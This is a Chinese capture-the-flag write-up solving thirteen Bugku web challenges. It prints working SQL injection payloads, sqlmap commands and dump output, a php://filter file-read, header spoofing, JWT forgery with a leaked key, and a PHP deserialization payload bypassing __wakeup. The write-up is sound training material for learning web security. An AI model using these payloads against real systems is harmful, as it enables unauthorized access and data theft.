| 作者:3ND 平台地址:https://new.bugku.com/
 web1 simple bypass
 extract — 从数组中将变量导入到当前的符号表,trim — 去除字符串首尾处的空白字符(或者其他字符)。 Payload: a=&b=即可成功绕过,回显flag{c3fd1661da5efb989c72b91f3c378759}。 web2 Quick calc<html><head><title></title></head><body><p>请在三秒之内计算出以下式子,计算正确就的到flag哦!<br/>418*693117+32*(9976+2487)</p><form action="" method="post">计算结果:<input type="text" name="result"/><input type="submit" value="提交"/></form></body></html>
 Payload: import reimport requestsurl = 'http://123.206.31.85:10002/'r = requests.session()text = r.get(url).textcalc = str(re.findall("(.*?)</p>", text))[2:-2]ans = eval(calc)data = {'result':ans}res = r.post(url, data)print(res.text)
 即可获得 flag{b37d6bdd7bb132c7c7f6072cd318697c}。 web3 php伪协议
 尝试上传 php文件时回显Sorry,only PNG files are allowed.。 判断为服务端白名单验证,这里参考 upload-labs题解思路进行测试。 
 测试无果,发现 url的op参数首页为op=home上传页面为op=upload,猜测存在文件包含漏洞~ op=1回显:Errornosuch page。
 参考: php 伪协议
 使用php伪协议尝试传参: ?op=php://filter/read=convert.base64-encode/resource=flag,回显PD9waHAgCiRmbGFnPSJmbGFne2UwMGY4OTMxMDM3Y2JkYjI1ZjZiMWQ4MmRmZTU1NTJmfSI7IAo/Pgo=。 Base64 decode: <?php $flag="flag{e00f8931037cbdb25f6b1d82dfe5552f}"; ?>
 web4 万能密码
 Payload: 万能密码, 注入点在password, password=' or '1'='1成功登陆。 flag{7ae7de60f14eb3cbd9403a0c4328598d} web5 injectionhint: injection 
 > sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: mod=read&id=2 AND 6548=6548    Vector: AND [INFERENCE]    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind    Payload: mod=read&id=2 RLIKE SLEEP(5)    Vector: RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))    Type: UNION query    Title: Generic UNION query (NULL) - 4 columns    Payload: mod=read&id=-1362 UNION ALL SELECT NULL,CONCAT(0x716b706b71,0x6b705a4550514d7864627845624c7252716d53456758474165446c66654e4a6b43714d776b767255,0x716b6a6b71),NULL,NULL-- vymr    Vector:  UNION ALL SELECT NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]---[21:03:29] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL >= 5.0.12...> sqlmap -u "http://47.95.208.167:10005/?mod=read&id=1" -p "id" -v 3 -D "web5" -T "flag" -C "flag" --dumpDatabase: web5Table: flag[1 entry]+----------------------------------------+| flag                                   |+----------------------------------------+| flag{320dbb1c03cdaaf29d16f9d653c88bcb} |+----------------------------------------+
 web6 XFF、F12
 提交 user=admin' or '1'='1、pass=' or '1'='1后回显:IP禁止访问,请联系本地管理员登陆,IP已被记录. 猜想 X-Forward-For:127.0.0.1,这里通过Firefox插件X-Forwarded-For Header直接修改。 提交 user=admin&pass=admin/user=amdin&pass=1后回显:Invalid credentials! Please try again! F12查看源代码在5023行: <!-- dGVzdDEyMw== -->。 base64.decode后得到密码 test123。 登陆后回显: Theflagis:85ff2ee4171396724bae20c0bd851f6b. web7 吃个小饼干吗?吃个小饼干吗? 
 注册测试用户后登陆, home.php页面如下: 
 任意内容提交回显相同页面。 想起小饼干的翻译是cookie,在报文中发现如下cookie字段: Set-Cookie: u=351e76680321232f297a57a5a743894a0e4a801fc3Set-Cookie: r=351e766803d63c7ede8cb1e1c8db5e51c63fd47cff# 规律如下Set-Cookie: u=351e766803 21232f297a57a5a743894a0e4a801fc3Set-Cookie: r=351e766803 d63c7ede8cb1e1c8db5e51c63fd47cff# md5(admin, 32) = 21232f297a57a5a743894a0e4a801fc3# d63c7ede8cb1e1c8db5e51c63fd47cff 解密明文为 limited
 尝试cookie欺骗~ 
 web8 SimpleSQLI
 注册测试账户后,个人信息更新页面如下: 
 dirsearch下发现有/.idea/workspace.xml泄露以及www.tar.gz源码文件。
 
 update.php中age处存在数字型注入点,payload如下: # 直接回显(select group_concat(description) from (select description from users where username=0x61646d696e)x)# 逐位爆破(注意csrf-token的处理)0|conv(hex(substr((select description from (select * from users where username like 0x61646d696e)a),1,1)), 16, 10)conv(hex(substr((select description from (select * from users where username regexp 0x61646d696e limit 0,1)a),1,1)), 16, 10)
 
 web9 PUT me message!put me a message bugku then you can get the flag 
 Base64.decode->flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}. web10 在线日记本hint:JWT你需要了解一哈. 
 
 base32.decode("NNVTU23LGEZDG===")=kk:kk123,username=kk&password=kk123提交登录。 
 
 下载 L3yx.php.swp文件,通过vi-r L3yx.php:wq还原文件。 <html><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>在线日记本</title><form action="" method="POST">  <p>username: <input type="text" name="username" /></p>  <p>password: <input type="password" name="password" /></p>  <input type="submit" value="login" /></form><!--hint:NNVTU23LGEZDG===--></html><?php    error_reporting(0);    require_once 'src/JWT.php';    const KEY = 'L3yx----++++----';    function loginkk()    {        $time = time();        $token = [          'iss'=>'L3yx',          'iat'=>$time,          'exp'=>$time+5,          'account'=>'kk'        ];        $jwt = \Firebase\JWT\JWT::encode($token,KEY);        setcookie("token",$jwt);        header("location:user.php");    }    if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')    {        if($_POST['username']=='kk' && $_POST['password']=='kk123')        {            loginkk();        }        else        {            echo "账号或密码错误";        }    }?> 
 JWT学习参考:JSON Web Token 入门教程 - 阮一峰
 获取 Key='L3yx----++++----',使用kk账户登录得到: # Header.Payload.Signaturetoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.ImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg# HeadereyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.# PayloadeyJpc3MiOiJMM3l4IiwiaWF0IjoxNTUxOTY1ODIxLCJleHAiOjE1NTE5NjU4MjYsImFjY291bnQiOiJrayJ9.# SignatureImnDWj4kYTxYyGfrOt-M0LCSwYSC8VtjdTfP03MLOyg
 
 更改account为L3yx,提前计算好iat和exp构造Token发包到user.php~ 
 
 web11 MD5截断比较<html><title>robots</title><body>We han't anything!</body></html>
 访问 .robots发现:Disallow: /shell.php,打开/shell.php. 
 可知为md5截断比较~ 每次刷新页面匹配值会改变,这里采用短时间生成大量MD5,牺牲空间来换取时间~ # -*- coding: utf-8 -*-import hashlibsum = []j = 0f = open("gen_md5.txt", "a")for i in xrange(1000000000):    tmp = (hashlib.md5(str(i)).hexdigest(),i)    sum.append(tmp)    j = j+1    if(j==10000000):        for i in sum:            f.write("{0} {1}".format(i,"\n"))        j=0        sum = []f.close()
 执行命令正则匹配: cat gen_md5.txt|grep \(\'str检索符合的MD5~ 
 得到:flag{e2f86fb5f75da4999e6f4957d89aaca0}. web12 unserializehint:时间好长啊 
 F12检查源代码发现注释掉的PHP代码: class Time{    public $flag = ******************;    public $truepassword = ******************;    public $time;    public $password ;    public function __construct($tt, $pp) {            $this->time = $tt;            $this->password = $pp;        }    function __destruct(){        if(!empty($this->password))        {            if(strcmp($this->password,$this->truepassword)==0){                echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";                if(!empty($this->time)){                    if(!is_numeric($this->time)){                        echo 'Sorry.<br>';                        show_source(__FILE__);                    }                    else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){                        echo 'you need a bigger time.<br>';                    }                    else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){                        echo 'you need a smaller time.<br>';                    }                    else{                        sleep((int)$this->time);                        var_dump($this->flag);                    }                    echo '<hr>';                }                else{                    echo '<h1>you have no time!!!!!</h1><br>';                }            }            else{                echo '<h1> assword is wrong............</h1><br>';            }        }        else{            echo "<h1> lease input password..........</h1><br>";        }    }    function __wakeup(){        $this->password = 1; echo 'hello hacker,I have changed your password and time, rua!';    }}if(isset($_GET['rua'])){    $rua = $_GET['rua'];    @unserialize($rua);}else{    echo "<h1> lease don't stop rua 233333</h1><br>";}
 典型的 PHP反序列化题目,可以参考:PHP反序列化由浅入深学习了解~ 简单审计思路:通过GET传值 rua后进行反序列化, unserialize() 会检查是否存在一个 wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。destruct()会在对象的所有引用都被删除或者当对象被显式销毁时执行,想要获取flag,我们需要rua满足一下条件: strcmp($this->password,$this->truepassword)==0$this->time < 11 * 22 * 33 * 44 * 55 * 66 & $this->time > 66 * 55 * 44 * 33 * 23 * 11sleep((int)$this->time)
 绕过方法: 绕过wakeup的执行(CVE-2016-7124):*当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行*,修改对象属性个数。绕过strcmp: Php5.3之后版本使用strcmp比较一个字符串和数组的话,将不再返回-1而是返回0,构造password数组。绕过sleep(): (1)使用16进制表示 0x开头,强制类型转化时会转化为0;(2)使用科学计数法绕过,1.3E9。
 
 构造脚本: <?phpclass Time{    public $time;    public $password;    public function __construct($tt, $pp) {            $this->time = $tt;            $this->password = $pp;    }}$array = array(    0 => "bar",    1 => "foo",);$time = '0x4d7c6d00';$rua = new Time($time, $array);echo serialize($rua);//O:4:"Time":2:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}?>
 Payload: rua=O:4:"Time":3:{s:4:"time";s:10:"0x4d7c6d00";s:8:"password";a:2:{i:0;s:3:"bar";i:1;s:3:"foo";}}. 
 web13 to be faster
 用BurpSuite抓包分析如下: 
 在response Header头里发现了 Password和Hint字段,base64解密Password后得到flag{f4970aacbacfba9e57ddbf998fa2e29d},提交错误~ Hint: Seeing is not believing, maybe you need to be faster! 尝试将Password解密后flag{}里面包含的字段提交回显如下: 
 推测需要先发送一个请求截取Password字段,然后base解密取flag{}内包含的值作为password的值发包,速度要快。 Payload: import requestsimport base64url = 'http://123.xxx.xxx.85:10013/index.php'r = requests.session()r1 = r.post(url, data = {'password':'flag'})Password = r1.headers['Password']password = str(base64.b64decode(Password), 'utf-8')[5:-1]r2 = r.post(url, data = {'password':password})print(r2.text)
 
 |